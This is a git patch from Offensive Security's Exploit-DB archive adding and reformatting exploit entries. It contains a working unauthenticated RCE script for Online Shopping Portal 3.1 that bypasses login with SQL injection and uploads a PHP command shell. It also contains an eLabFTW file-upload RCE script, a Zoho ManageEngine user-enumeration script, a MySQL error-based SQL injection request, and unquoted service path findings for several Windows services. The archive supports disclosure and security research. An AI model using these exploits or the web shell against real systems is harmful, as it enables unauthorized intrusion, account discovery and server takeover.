From db4eeaac4176b5ef40657ca74c5d19ddaa0f7238 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 18 Jun 2021 05:01:58 +0000 Subject: [PATCH] DB: 2021-06-18 9 changes to exploits/shellcodes Sync Breeze 13.6.18 - 'Multiple' Unquoted Service Path Disk Savvy 13.6.14 - 'Multiple' Unquoted Service Path Dup Scout 13.5.28 - 'Multiple' Unquoted Service Path VX Search 13.5.28 - 'Multiple' Unquoted Service Path Workspace ONE Intelligent Hub 20.3.8.0 - 'VMware Hub Health Monitoring Service' Unquoted Service Path Unified Office Total Connect Now 1.0 - 'data' SQL Injection Zoho ManageEngine ServiceDesk Plus MSP 9.4 - User Enumeration Online Shopping Portal 3.1 - Remote Code Execution (Unauthenticated) --- exploits/java/webapps/50027.py | 60 ++++++++++++++++++++++++++++++++ exploits/php/webapps/46869.py | 59 ++++++++++++------------------- exploits/php/webapps/50022.txt | 52 +++++++++++++++++++++++++++ exploits/php/webapps/50029.py | 42 ++++++++++++++++++++++ exploits/windows/local/50023.txt | 50 ++++++++++++++++++++++++++ exploits/windows/local/50024.txt | 50 ++++++++++++++++++++++++++ exploits/windows/local/50025.txt | 50 ++++++++++++++++++++++++++ exploits/windows/local/50026.txt | 50 ++++++++++++++++++++++++++ exploits/windows/local/50028.txt | 28 +++++++++++++++ files_exploits.csv | 8 +++++ 10 files changed, 412 insertions(+), 37 deletions(-) create mode 100755 exploits/java/webapps/50027.py create mode 100644 exploits/php/webapps/50022.txt create mode 100755 exploits/php/webapps/50029.py create mode 100644 exploits/windows/local/50023.txt create mode 100644 exploits/windows/local/50024.txt create mode 100644 exploits/windows/local/50025.txt create mode 100644 exploits/windows/local/50026.txt create mode 100644 exploits/windows/local/50028.txt diff --git a/exploits/java/webapps/50027.py b/exploits/java/webapps/50027.py new file mode 100755 index 000000000..8f63b6e9e --- /dev/null +++ b/exploits/java/webapps/50027.py @@ -0,0 +1,60 @@ +# Exploit Title: Zoho ManageEngine ServiceDesk Plus MSP 9.4 - User Enumeration +# Date: 17/06/2021 +# Exploit Author: Ricardo Ruiz (@ricardojoserf) +# CVE: CVE-2021-31159 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31159) +# Vendor Homepage: https://www.manageengine.com +# Vendor Confirmation: https://www.manageengine.com/products/service-desk-msp/readme.html#10519 +# Version: Previous to build 10519 +# Tested on: Zoho ManageEngine ServiceDesk Plus 9.4 +# Example: python3 exploit.py -t http://example.com/ -d DOMAIN -u USERSFILE [-o OUTPUTFILE] +# Repository (for updates and fixing bugs): https://github.com/ricardojoserf/CVE-2021-31159 + +import argparse +import requests +import urllib3 +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + + +def get_args(): + parser = argparse.ArgumentParser() + parser.add_argument('-d', '--domain', required=True, action='store', help='Domain to attack') + parser.add_argument('-t', '--target', required=True, action='store', help='Target Url to attack') + parser.add_argument('-u', '--usersfile', required=True, action='store', help='Users file') + parser.add_argument('-o', '--outputfile', required=False, default="listed_users.txt", action='store', help='Output file') + my_args = parser.parse_args() + return my_args + + +def main(): + args = get_args() + url = args.target + domain = args.domain + usersfile = args.usersfile + outputfile = args.outputfile + + s = requests.session() + s.get(url) + resp_incorrect = s.get(url+"/ForgotPassword.sd?userName="+"nonexistentuserforsure"+"&dname="+domain, verify = False) + incorrect_size = len(resp_incorrect.content) + print("Incorrect size: %s"%(incorrect_size)) + + correct_users = [] + users = open(usersfile).read().splitlines() + for u in users: + resp = s.get(url+"/ForgotPassword.sd?userName="+u+"&dname="+domain, verify = False) + valid = (len(resp.content) != incorrect_size) + if valid: + correct_users.append(u) + print("User: %s Response size: %s (correct: %s)"%(u, len(resp.content),str(valid))) + + print("\nCorrect users\n") + with open(outputfile, 'w') as f: + for user in correct_users: + f.write("%s\n" % user) + print("- %s"%(user)) + + print("\nResults stored in %s\n"%(outputfile)) + + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/php/webapps/46869.py b/exploits/php/webapps/46869.py index bfbe9a4e7..015dd1df6 100755 --- a/exploits/php/webapps/46869.py +++ b/exploits/php/webapps/46869.py @@ -1,33 +1,25 @@ -#!/usr/bin/env python -# -# Exploit Title : eLabFTW 1.8.5 'EntityController' Arbitrary -File Upload / RCE +# Exploit Title : eLabFTW 1.8.5 'EntityController' Arbitrary File Upload / RCE # Date : 5/18/19 # Exploit Author : liquidsky (JMcPeters) # Vulnerable Software : eLabFTW 1.8.5 # Vendor Homepage : https://www.elabftw.net/ # Version : 1.8.5 # Software Link : https://github.com/elabftw/elabftw -# Tested On : Linux / PHP Version 7.0.33 / Default -installation (Softaculous) +# Tested On : Linux / PHP Version 7.0.33 / Default installation (Softaculous) # Author Site : http://incidentsecurity.com | https://github.com/fuzzlove # # Greetz : wetw0rk, offsec ^^ # -# Description: eLabFTW 1.8.5 is vulnerable to arbitrary file uploads -via the /app/controllers/EntityController.php component. -# This may result in remote command execution. An attacker can use a -user account to fully compromise the system using a POST request. -# This will allow for PHP files to be written to the web root, and for -code to execute on the remote server. +# Description: eLabFTW 1.8.5 is vulnerable to arbitrary file uploads via the /app/controllers/EntityController.php component. +# This may result in remote command execution. An attacker can use a user account to fully compromise the system using a POST request. +# This will allow for PHP files to be written to the web root, and for code to execute on the remote server. # -# Notes: Once this is done a php shell will drop at https://[target -site]/[elabftw directory]/uploads/[random 2 alphanum]/[random long -alphanumeric].php5?e=whoami -# You will have to visit the uploads directory on the site to see what -the name is. However there is no protection against directory listing. +# Notes: Once this is done a php shell will drop at https://[targetsite]/[elabftw directory]/uploads/[random 2 alphanum]/[random long alphanumeric].php5?e=whoami +# You will have to visit the uploads directory on the site to see what the name is. However there is no protection against directory listing. # So this can be done by an attacker remotely. +#!/usr/bin/env python + import requests from bs4 import BeautifulSoup as bs4 requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) @@ -44,20 +36,17 @@ print "+-------------------------------------------------------------+" try: -target = sys.argv[1] -email = sys.argv[2] -password = sys.argv[3] -directory = sys.argv[4] + target = sys.argv[1] + email = sys.argv[2] + password = sys.argv[3] + directory = sys.argv[4] except IndexError: - print -print "- Usage: %s " % sys.argv[0] -print "- Example: %s incidentsecurity.com user@email.com mypassword -elabftw" % sys.argv[0] - print -sys.exit() + print "- Usage: %s " % sys.argv[0] + print "- Example: %s incidentsecurity.com user@email.com mypassword elabftw" % sys.argv[0] + sys.exit() proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'} @@ -109,7 +98,7 @@ s = requests.Session() print "[*] Visiting eLabFTW Site" r = s.get('https://' + target + '/' + directory + -'/login.php',verify=False, proxies=proxies) +'/login.php',verify=False) print "[x]" # Grabbing token @@ -126,8 +115,7 @@ time.sleep(2) print "[*] Logging in to eLabFTW" r = s.post('https://' + target + '/' + directory + -'/app/controllers/LoginController.php', data=values, verify=False, -proxies=proxies) +'/app/controllers/LoginController.php', data=values, verify=False) print "[x] Logged in :)" @@ -138,8 +126,7 @@ sessionId = s.cookies['PHPSESSID'] headers = { #POST /elabftw/app/controllers/EntityController.php HTTP/1.1 #Host: incidentsecurity.com - "User-Agent": "Mozilla/5.0 (X11; Linux i686; rv:52.0) -Gecko/20100101 Firefox/52.0", + "User-Agent": "Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0", "Accept": "application/json", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", @@ -147,8 +134,7 @@ Gecko/20100101 Firefox/52.0", "Cache-Control": "no-cache", "X-Requested-With": "XMLHttpRequest", "Content-Length": "588", - "Content-Type": "multipart/form-data; -boundary=---------------------------72167598110874594111630395077", + "Content-Type": "multipart/form-data; boundary=---------------------------72167598110874594111630395077", "Connection": "close", "Cookie": "PHPSESSID=" + sessionId + ";" + "token=" + token } @@ -156,11 +142,10 @@ boundary=---------------------------72167598110874594111630395077", print "[*] Sending payload..." r = s.post('https://' + target + '/' + directory + '/app/controllers/EntityController.php',verify=False, headers=headers, -data=data, proxies=proxies) +data=data) print "[x] Payload sent" print print "Now check https://%s/%s/uploads" % (target, directory) print "Your php shell will be there under a random name (.php5)" print -print "i.e https://[vulnerable -site]/elabftw/uploads/60/6054a32461de6294843b7f7ea9ea2a34a19ca420752b087c87011144fc83f90b9aa5bdcdce5dee132584f6da45b7ec9e3841405e9d67a7d196f064116cf2da38.php5?e=whoami" \ No newline at end of file +print "i.e https://[vulnerable site]/elabftw/uploads/60/6054a32461de6294843b7f7ea9ea2a34a19ca420752b087c87011144fc83f90b9aa5bdcdce5dee132584f6da45b7ec9e3841405e9d67a7d196f064116cf2da38.php5?e=whoami" \ No newline at end of file diff --git a/exploits/php/webapps/50022.txt b/exploits/php/webapps/50022.txt new file mode 100644 index 000000000..0c4a321ff --- /dev/null +++ b/exploits/php/webapps/50022.txt @@ -0,0 +1,52 @@ +# Exploit Title: Unified Office Total Connect Now 1.0 – 'data' SQL Injection +# Shodan Filter: http.title:"TCN User Dashboard" +# Date: 06-16-2021 +# Exploit Author: Ajaikumar Nadar +# Vendor Homepage: https://unifiedoffice.com/ +# Software Link: https://unifiedoffice.com/voip-business-solutions/ +# Version: 1.0 +# Tested on: CentOS + Apache/2.2.15 + +POC: +1. Go to url http://localhost/operator/operatorLogin.php and login +2. Capture the request in Burpsuite and use the payload as given below. +3. Observe the response which reveals the DB version of mysql. + +Request: + +POST /operator/operatorLogin.php HTTP/1.1 +Host: localhost +Connection: close +Content-Length: 178 +sec-ch-ua: "Chromium";v="89", ";Not A Brand";v="99" +Accept: */* +X-Requested-With: XMLHttpRequest +sec-ch-ua-mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Origin: https://localhost +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: https://localhost/operator/ +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=sosbriscgul9onu25sf2731e81 + +data={"extension":"((select 1 from (select count(*), concat(0x3a,0x3a,(select version()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b))","pin":"bar"} + + +Response: + +HTTP/1.1 400 Bad Request +Date: Wed, 16 Jun 2021 12:49:56 GMT +Server: Apache/2.2.15 (CentOS) +X-Powered-By: PHP/5.3.10 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 139 +Connection: close +Content-Type: text/html; charset=UTF-8 + +Query failed, called from: sqlquery:/var/www/html/recpanel/operator/operatorLogin.php:62: Duplicate entry '::5.1.73::1' for key 'group_key' \ No newline at end of file diff --git a/exploits/php/webapps/50029.py b/exploits/php/webapps/50029.py new file mode 100755 index 000000000..dc1583ba5 --- /dev/null +++ b/exploits/php/webapps/50029.py @@ -0,0 +1,42 @@ +# Exploit Title: Online Shopping Portal 3.1 - Remote Code Execution (Unauthenticated) +# Date: 17.06.2021 +# Exploit Author: Tagoletta (Tağmaç) +# Software Link: https://phpgurukul.com/shopping-portal-free-download/ +# Version: V3.1 +# Tested on: Windows & Ubuntu + + +import requests +import random +import string + + +url = "http://192.168.1.3:80/shopping" +payload= "'; $cmd = ($_GET['cmd']); system($cmd); echo ''; die; } ?>" + +session = requests.session() + +print("logining") + +request_url = url+"/admin/" +post_data = {"username": "' OR 1=1-- a", "password": '', "submit": ''} +session.post(request_url, data=post_data) + +let = string.ascii_lowercase +shellname = ''.join(random.choice(let) for i in range(15)) +randstr = ''.join(random.choice(let) for i in range(15)) + +print("product name is "+randstr) +print("shell name is "+shellname) +print("uploading payload") + +request_url = url+"/admin/insert-product.php" +post_header = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryJNYN304wDTnp1QmE", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": url+"/admin/insert-product.php", "Accept-Encoding": "gzip, deflate", "Connection": "close"} +post_data = "------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"category\"\r\n\r\n80\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"subcategory\"\r\n\r\n8080\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productName\"\r\n\r\n"+randstr+"\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productCompany\"\r\n\r\nTagoletta\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productpricebd\"\r\n\r\nTagoletta\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productprice\"\r\n\r\nTagoletta\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productDescription\"\r\n\r\nTagoletta\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productShippingcharge\"\r\n\r\nTagoletta\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productAvailability\"\r\n\r\nIn Stock\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productimage1\"; filename=\""+shellname+".php\"\r\nContent-Type: application/octet-stream\r\n\r\n"+payload+"\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productimage2\"; filename=\""+shellname+".php\"\r\nContent-Type: application/octet-stream\r\n\r\n"+payload+"\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productimage3\"; filename=\""+shellname+".php\"\r\nContent-Type: application/octet-stream\r\n\r\n"+payload+"\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\n\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE--\r\n" +session.post(request_url, headers=post_header, data=post_data) + +request_url = url+"/search-result.php" +post_data = {"product": randstr, "search": ''} +shellpath = str(requests.post(request_url, data=post_data).content).split("data-echo=\"admin/productimages")[1].split(shellname+".php")[0] + +print("\npath of shell= "+url+"/admin/productimages"+shellpath+shellname+".php") \ No newline at end of file diff --git a/exploits/windows/local/50023.txt b/exploits/windows/local/50023.txt new file mode 100644 index 000000000..e4170e4ea --- /dev/null +++ b/exploits/windows/local/50023.txt @@ -0,0 +1,50 @@ +# Exploit Title: Sync Breeze 13.6.18 - 'Multiple' Unquoted Service Path +# Discovery by: Brian Rodriguez +# Date: 16-06-2021 +# Vendor Homepage: https://www.syncbreeze.com/ +# Software Links: +# https://www.syncbreeze.com/setups_x64/syncbreezesrv_setup_v13.6.18_x64.exe +# https://www.syncbreeze.com/setups_x64/syncbreezeent_setup_v13.6.18_x64.exe +# Tested Version: 13.6.18 +# Vulnerability Type: Unquoted Service Path +# Tested on: Windows 10 Enterprise 64 bits + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" +|findstr /i /v "c:\windows\\" |findstr /i /v """ + +Sync Breeze Server Sync Breeze Server C:\Program Files\Sync Breeze +Server\bin\syncbrs.exe Auto +Sync Breeze Enterprise Sync Breeze Enterprise C:\Program Files\Sync +Breeze Enterprise\bin\syncbrs.exe Auto + +C:\Users\IEUser>sc qc "Sync Breeze Server" +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: Sync Breeze Server + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 0 IGNORE + NOMBRE_RUTA_BINARIO: C:\Program Files\Sync Breeze +Server\bin\syncbrs.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : Sync Breeze Server + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem + +C:\Users\IEUser>sc qc "Sync Breeze Enterprise" +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: Sync Breeze Enterprise + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 0 IGNORE + NOMBRE_RUTA_BINARIO: C:\Program Files\Sync Breeze +Enterprise\bin\syncbrs.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : Sync Breeze Enterprise + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/50024.txt b/exploits/windows/local/50024.txt new file mode 100644 index 000000000..974c1f79d --- /dev/null +++ b/exploits/windows/local/50024.txt @@ -0,0 +1,50 @@ +# Exploit Title: Disk Savvy 13.6.14 - 'Multiple' Unquoted Service Path +# Discovery by: Brian Rodriguez +# Date: 16-06-2021 +# Vendor Homepage: https://www.disksavvy.com +# Software Links: +# https://www.disksavvy.com/setups_x64/disksavvysrv_setup_v13.6.14_x64.exe +# https://www.disksavvy.com/setups_x64/disksavvyent_setup_v13.6.14_x64.exe +# Tested Version: 13.6.14 +# Vulnerability Type: Unquoted Service Path +# Tested on: Windows 10 Enterprise 64 bits + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" +|findstr /i /v "c:\windows\\" |findstr /i /v """ + +Disk Savvy Server Disk Savvy Server C:\Program Files\Disk Savvy +Server\bin\disksvs.exe Auto +Disk Savvy Enterprise Disk Savvy Enterprise C:\Program Files\Disk +Savvy Enterprise\bin\disksvs.exe Auto + +C:\>sc qc "Disk Savvy Server" +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: Disk Savvy Server + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 0 IGNORE + NOMBRE_RUTA_BINARIO: C:\Program Files\Disk Savvy +Server\bin\disksvs.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : Disk Savvy Server + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem + +C:\>sc qc "Disk Savvy Enterprise" +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: Disk Savvy Enterprise + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 0 IGNORE + NOMBRE_RUTA_BINARIO: C:\Program Files\Disk Savvy +Enterprise\bin\disksvs.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : Disk Savvy Enterprise + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/50025.txt b/exploits/windows/local/50025.txt new file mode 100644 index 000000000..c9550f44e --- /dev/null +++ b/exploits/windows/local/50025.txt @@ -0,0 +1,50 @@ +# Exploit Title: Dup Scout 13.5.28 - 'Multiple' Unquoted Service Path +# Discovery by: Brian Rodriguez +# Date: 16-06-2021 +# Vendor Homepage: https://www.dupscout.com +# Software Links: +# https://www.dupscout.com/setups_x64/dupscoutsrv_setup_v13.5.28_x64.exe +# https://www.dupscout.com/setups_x64/dupscoutent_setup_v13.5.28_x64.exe +# Tested Version: 13.5.28 +# Vulnerability Type: Unquoted Service Path +# Tested on: Windows 10 Enterprise 64 bits + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" +|findstr /i /v "c:\windows\\" |findstr /i /v """ + +Dup Scout Server Dup Scout Server C:\Program Files\Dup Scout +Server\bin\dupscts.exe Auto +Dup Scout Enterprise Dup Scout Enterprise C:\Program Files\Dup Scout +Enterprise\bin\dupscts.exe Auto + +C:\>sc qc "Dup Scout Server" +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: Dup Scout Server + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 0 IGNORE + NOMBRE_RUTA_BINARIO: C:\Program Files\Dup Scout +Server\bin\dupscts.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : Dup Scout Server + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem + +C:\>sc qc "Dup Scout Enterprise" +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: Dup Scout Enterprise + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 0 IGNORE + NOMBRE_RUTA_BINARIO: C:\Program Files\Dup Scout +Enterprise\bin\dupscts.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : Dup Scout Enterprise + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/50026.txt b/exploits/windows/local/50026.txt new file mode 100644 index 000000000..a1f542035 --- /dev/null +++ b/exploits/windows/local/50026.txt @@ -0,0 +1,50 @@ +# Exploit Title: VX Search 13.5.28 - 'Multiple' Unquoted Service Path +# Discovery by: Brian Rodriguez +# Date: 16-06-2021 +# Vendor Homepage: https://www.vxsearch.com +# Software Links: +# https://www.vxsearch.com/setups_x64/vxsearchsrv_setup_v13.5.28_x64.exe +# https://www.vxsearch.com/setups_x64/vxsearchent_setup_v13.5.28_x64.exe +# Tested Version: 13.5.28 +# Vulnerability Type: Unquoted Service Path +# Tested on: Windows 10 Enterprise 64 bits + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" +|findstr /i /v "c:\windows\\" |findstr /i /v """ + +VX Search Server VX Search Server C:\Program Files\VX Search +Server\bin\vxsrchs.exe Auto +VX Search Enterprise VX Search Enterprise C:\Program Files\VX Search +Enterprise\bin\vxsrchs.exe Auto + +C:\>sc qc "VX Search Server" +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: VX Search Server + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 0 IGNORE + NOMBRE_RUTA_BINARIO: C:\Program Files\VX Search +Server\bin\vxsrchs.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : VX Search Server + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem + +C:\>sc qc "VX Search Enterprise" +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: VX Search Enterprise + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 0 IGNORE + NOMBRE_RUTA_BINARIO: C:\Program Files\VX Search +Enterprise\bin\vxsrchs.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : VX Search Enterprise + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/50028.txt b/exploits/windows/local/50028.txt new file mode 100644 index 000000000..f9c90b2a1 --- /dev/null +++ b/exploits/windows/local/50028.txt @@ -0,0 +1,28 @@ +# Exploit Title: Workspace ONE Intelligent Hub 20.3.8.0 - 'VMware Hub Health Monitoring Service' Unquoted Service Path +# Discovery by: Ismael Nava +# Discovery Date: 06-16-2021 +# Vendor Homepage: https://www.vmware.com/mx/products/workspace-one/intelligent-hub.html +# Software Links : https://getwsone.com/ +# Tested Version: 20.3.8.0 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Windows 10 Enterprise 64 bits + + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """ +VMware Hub Health Monitoring Service VMware Hub Health Monitoring Service C:\Program Files (x86)\Airwatch\HealthMonitoring\Service\VMwareHubHealthMonitoring.exe Auto + +C:\>sc qc "VMware Hub Health Monitoring Service" +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: VMware Hub Health Monitoring Service + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Airwatch\HealthMonitoring\Service\VMwareHubHealthMonitoring.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : VMware Hub Health Monitoring Service + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 11e0e5685..14dbf1531 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11370,6 +11370,11 @@ id,file,description,date,author,type,platform,port 50011,exploits/linux/local/50011.sh,"Polkit 0.105-26 0.117-2 - Local Privilege Escalation",2021-06-15,"J Smith",local,linux, 50012,exploits/windows/local/50012.txt,"DiskPulse 13.6.14 - 'Multiple' Unquoted Service Path",2021-06-16,"Brian Rodriguez",local,windows, 50013,exploits/windows/local/50013.txt,"Disk Sorter Server 13.6.12 - 'Disk Sorter Server' Unquoted Service Path",2021-06-16,BRushiran,local,windows, +50023,exploits/windows/local/50023.txt,"Sync Breeze 13.6.18 - 'Multiple' Unquoted Service Path",2021-06-17,"Brian Rodriguez",local,windows, +50024,exploits/windows/local/50024.txt,"Disk Savvy 13.6.14 - 'Multiple' Unquoted Service Path",2021-06-17,"Brian Rodriguez",local,windows, +50025,exploits/windows/local/50025.txt,"Dup Scout 13.5.28 - 'Multiple' Unquoted Service Path",2021-06-17,"Brian Rodriguez",local,windows, +50026,exploits/windows/local/50026.txt,"VX Search 13.5.28 - 'Multiple' Unquoted Service Path",2021-06-17,"Brian Rodriguez",local,windows, +50028,exploits/windows/local/50028.txt,"Workspace ONE Intelligent Hub 20.3.8.0 - 'VMware Hub Health Monitoring Service' Unquoted Service Path",2021-06-17,"Ismael Nava",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -44172,3 +44177,6 @@ id,file,description,date,author,type,platform,port 50018,exploits/php/webapps/50018.txt,"Teachers Record Management System 1.0 - 'Multiple' SQL Injection (Authenticated)",2021-06-16,nhattruong,webapps,php, 50019,exploits/php/webapps/50019.txt,"Teachers Record Management System 1.0 - 'email' Stored Cross-site Scripting (XSS)",2021-06-16,nhattruong,webapps,php, 50021,exploits/php/webapps/50021.txt,"CKEditor 3 - Server-Side Request Forgery (SSRF)",2021-06-16,ahmed,webapps,php, +50022,exploits/php/webapps/50022.txt,"Unified Office Total Connect Now 1.0 - 'data' SQL Injection",2021-06-17,"Ajaikumar Nadar",webapps,php, +50027,exploits/java/webapps/50027.py,"Zoho ManageEngine ServiceDesk Plus MSP 9.4 - User Enumeration",2021-06-17,"Ricardo Ruiz",webapps,java, +50029,exploits/php/webapps/50029.py,"Online Shopping Portal 3.1 - Remote Code Execution (Unauthenticated)",2021-06-17,Tagoletta,webapps,php,